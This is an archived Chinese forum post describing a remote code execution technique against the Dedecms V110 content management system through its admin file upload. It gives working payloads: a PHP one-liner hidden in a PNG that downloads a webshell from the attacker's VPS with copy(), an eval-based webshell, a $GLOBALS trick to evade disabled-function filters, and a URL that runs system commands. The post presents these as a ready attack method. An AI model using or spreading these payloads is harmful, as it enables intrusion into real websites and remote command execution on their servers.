物联网Dedecms V110最新版RCE-Tricks - Powered by Discuz! Archiver

南飓风 发表于 2025-1-17 08:54:40

Dedecms V110最新版RCE---Tricks

前言

刚发现Dedecms更新了发布版本，顺便测试一下之前的day有没有修复，突然想到了新的tricks去实现RCE。
文章发布的时间估计比力晚了，一直没时间写了。
利用

/uploads/dede/article_string_mix.php
/uploads/dede/article_template_rand.php
/uploads/dede/sys_task.php
...... 我发布的文档->>>>添加文档->>>>站内选择进行文件上传
/uploads/dede/content_list.php](http://dedecms.xyz:8066/uploads/dede/content_list.php?mid=1)
/uploads/dede/catalog_do.php?channelid=0&cid=0&dopost=addArchives
https://i-blog.csdnimg.cn/img_convert/145a3abc91ec18fcb8d895b537dd06fb.jpeg

文件上传

https://i-blog.csdnimg.cn/img_convert/a3d471daff3bb2ab278930a5d31b5443.jpeg

在vps上起一个http的服务，端口设置为8016

https://i-blog.csdnimg.cn/img_convert/08a1dfcb50c3da898d5758069ed0341e.jpeg

远程服务器存放shell.php，文件内容为
<?php @eval ($_POST ['a']);?> 准备一个图片格式的文件,文件内容为，这里我上传的文件名称为f.png
<? copy("http://192.168.225.40:8016/shell.php","shell.php");?> 上传成功后可以看到上传的图片的位置

https://i-blog.csdnimg.cn/img_convert/54791833f6ed30d5e1d1baac6922b4d3.jpeg

修改文件名为b.php

https://i-blog.csdnimg.cn/img_convert/a439fd9598c9b4d576974dfb0a151786.jpeg

生存发现png图片已成功被更改，访问b.php,从远程vps下载了shell.php，当前目录下存在一个名称为shell.php的木马文件

https://i-blog.csdnimg.cn/img_convert/b5b1d245d6c161443d39c90533b0c2c8.jpeg

https://i-blog.csdnimg.cn/img_convert/76968540ffd6c9468ce827f43e9d24ea.jpeg

利用webshell进行下令执行。

https://i-blog.csdnimg.cn/img_convert/4367c36f21c548af044588a504e14486.jpeg

成功执行了下令
思索

假如不考虑文件上传后缀名绕过方法，仅以上面图片格式的文件上传的话，那么无所谓上传的什么内容，因为本身来讲dede的代码中对文件内容是做的有校验的

https://i-blog.csdnimg.cn/img_convert/a6331de4791957f3207b94ee112bd873.jpeg

所以文件内有两种绕过方法

[*] • 正则绕过
[*] • disable函数绕过
简朴搜刮了一下各个平台的文章，着实是有师傅正则绕过实现webshell的。第二点儿，disable函数绕过，往前几个版本，有兴趣的可以看一下源码，之前利用全局变量Globals绕过

https://i-blog.csdnimg.cn/img_convert/bc1be65779a53a8b56d5c381b810136d.jpeg

代码内容
<?php
$a = $GLOBALS["_GET"];
$b = $GLOBALS["_GET"];
$a['test1']($b['test2'])
?>
https://i-blog.csdnimg.cn/img_convert/ab4768858a7e5727aad9553e630cc85c.jpeg

下令执行
http://dedecms.org:8016/uploads/shell.php?test1=assert&&test2=system(%22ipconfig%22);

https://i-blog.csdnimg.cn/img_convert/e8d8e9b968360e5c442d4a672c4cf587.jpeg

成功执行下令,且该下令执行为未授权下令执行。
所以在官方前几个版本中已经更新了，添加进了禁用方法

https://i-blog.csdnimg.cn/img_convert/1f28dc3cb0b827a1afacfe72caf410f4.jpeg
所以在绕过禁用方法上来讲更轻易一点儿。所以在利用上这里利用了copy函数的特性，那么这里提醒一下，别的的函数固然也可以满意效果。

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

页: [1]

IT评测·应用市场-qidao123.com技术社区's Archiver

Dedecms V110最新版RCE---Tricks